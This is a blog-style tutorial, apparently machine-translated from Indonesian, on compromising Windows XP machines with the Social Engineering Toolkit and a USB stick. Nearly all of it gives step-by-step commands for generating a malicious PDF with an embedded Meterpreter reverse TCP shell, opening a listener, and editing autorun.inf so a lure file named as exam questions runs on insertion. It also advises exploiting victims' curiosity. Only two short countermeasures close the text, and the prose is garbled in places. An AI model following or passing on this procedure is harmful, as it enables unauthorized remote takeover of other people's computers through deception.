Hacking Windows With BackTrack SET & USB

Tools used: SET ( Social Engineering Toolkit )
OS used: Backtrack 5
Victim OS: Windows XP SP3 (autorun function = on)

Hacking Windows With BackTrack SET & USB

As we know that lately the USB is really very, very popular for use in all societies ...
When I was a nge-kost, sometimes I hear my next door neighbor said to the neighbor next to him again " Hey, my copy of yesterday's dong song ... ya its USB, fine copy of udah ntar kalo lo gue kasih tau aja ".

Actually is it possible to perform attacks against other computers just by using USB? the answer we see the following steps below:

Preparation:
1. SET
2. OS (my 5 pake backtrack that already include such tools in dalemnya all) Description: Writing Colour Red = command line

Steps:
1. Open the console backtrack (CTRL + ALT + T) then go to the folder / pentest / exploits / set. cd / pentest / exploits / set

2. Start the Social Engineering Toolkit with the command . / set .

3. Select the Number 3 " Infectious File Generator "and select the number 1" File Format Exploit ", and then enter the IP address the attacker (computer)

4. Select a format exploits that would be used ... here I use to use " Adobe PDF Embedded EXE social engineering ".

5. The next step is to choose a PDF file that will be used to attack. If my friends have the PDF file itself, it is much better because of the victim so he does not go too suspicious, so here we choose the number 1.

6. The next step is to select the payload or what we want to be the victim if he clicks exploits that we make.Here I choose number 2 " Windows Meterpreter Reverse_TCP shell "

7. Next is setting up the connect back , the point is when the exploit successfully runs, the port is what we'll catch the connection? Here I use port 80 (why port 80?'ll look at the source aja)

8. When the question " Do you want to create a listener right now? [Yes | no] "select YES.

9. All files successfully generated by SET stored in the folder / pentest / exploits / set / autorun, but the name of the file is somewhat suspicious & less interesting so it is better if we change the first naming the file.
go to autorun folder: cd / pentest / exploits / set / autorun

10. Perform this command pico autorun.inf

11. Inside the autorun.inf file, change file names template.pdf be attractive to the victim to open the file. Here are the contents of autorun.inf I made: [autorun] open = Soal_UAS_2011_Aljabar.pdf icon = autorun.ico Then press CTRL + O to do a SAVE and CTRL + X to exit.

12. The next step is naming template.pdf be the name that we have defined it to autorun.inf with the command mv. mv template.pdf Soal_UAS_2011_Aljabar.pdf

13. It's finished, then stayed to copy all the files in the autorun folder into your USB.

14. When plugging in the USB and autorun victim computer is switched on, it will automatically open the PDF file we created earlier.

15. When he click OK for each alert that pops up, then:

Success!

FAQ:
Q: So what if it turns out autorun victim in a state computer is turned off?
A: Human nature is usually curious & curiosity, certainly all the way will he do to the PDF is open especially after knowing that his Title PPT are important & interesting for him.

Countermeasures:
1. When an alert appears, or things that make little sense when opening a file with certain extensions, better undo / cancel the course should not be forwarded.
2. Turn off autorun / autoplay

By v4l - Source: http://www.vishnuvalentino.com

Also Check out Video Below To Priveledge Escalation Windows 7

Link Download Social Engineering Toolkit :

Hopefully useful & safe learning